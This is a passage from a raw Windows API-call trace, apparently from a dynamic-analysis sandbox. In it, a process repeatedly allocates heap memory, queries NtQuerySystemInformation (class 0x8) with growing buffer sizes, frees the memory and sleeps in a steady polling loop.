SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0279.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.958] Sleep (dwMilliseconds=0x110) [0279.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0279.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0279.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0279.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0279.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.969] Sleep (dwMilliseconds=0x110) [0279.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0279.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0279.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0279.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0279.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0279.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0279.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0279.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0279.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.985] Sleep (dwMilliseconds=0x110) [0279.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0279.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0279.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0279.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0279.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0279.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0279.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.000] Sleep (dwMilliseconds=0x110) [0280.040] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0280.040] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.040] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0280.040] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0280.040] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.041] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0280.041] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0280.041] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.041] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0280.041] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0280.041] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0280.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.043] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.044] Sleep (dwMilliseconds=0x110) [0280.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0280.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0280.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0280.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0280.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0280.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0280.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0280.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0280.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.063] Sleep (dwMilliseconds=0x110) [0280.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0280.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0280.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0280.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0280.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0280.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0280.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.080] Sleep (dwMilliseconds=0x110) [0280.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0280.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0280.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0280.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0280.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0280.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0280.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0280.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0280.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.095] Sleep (dwMilliseconds=0x110) [0280.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0280.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0280.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0280.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0280.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0280.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0280.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0280.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0280.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.109] Sleep (dwMilliseconds=0x110) [0280.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0280.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0280.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0280.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0280.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0280.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0280.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0280.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0280.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.125] Sleep (dwMilliseconds=0x110) [0280.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0280.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0280.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0280.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0280.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0280.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0280.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0280.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0280.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.141] Sleep (dwMilliseconds=0x110) [0280.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0280.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0280.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0280.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0280.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0280.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0280.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0280.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0280.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.172] Sleep (dwMilliseconds=0x110) [0280.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0280.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0280.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0280.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0280.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0280.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0280.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0280.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0280.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.192] Sleep (dwMilliseconds=0x110) [0280.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0280.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0280.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0280.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0280.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0280.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0280.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0280.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0280.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0280.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0280.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0280.206] Sleep (dwMilliseconds=0x110) [0280.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0280.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0280.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0280.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0280.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0280.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0280.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 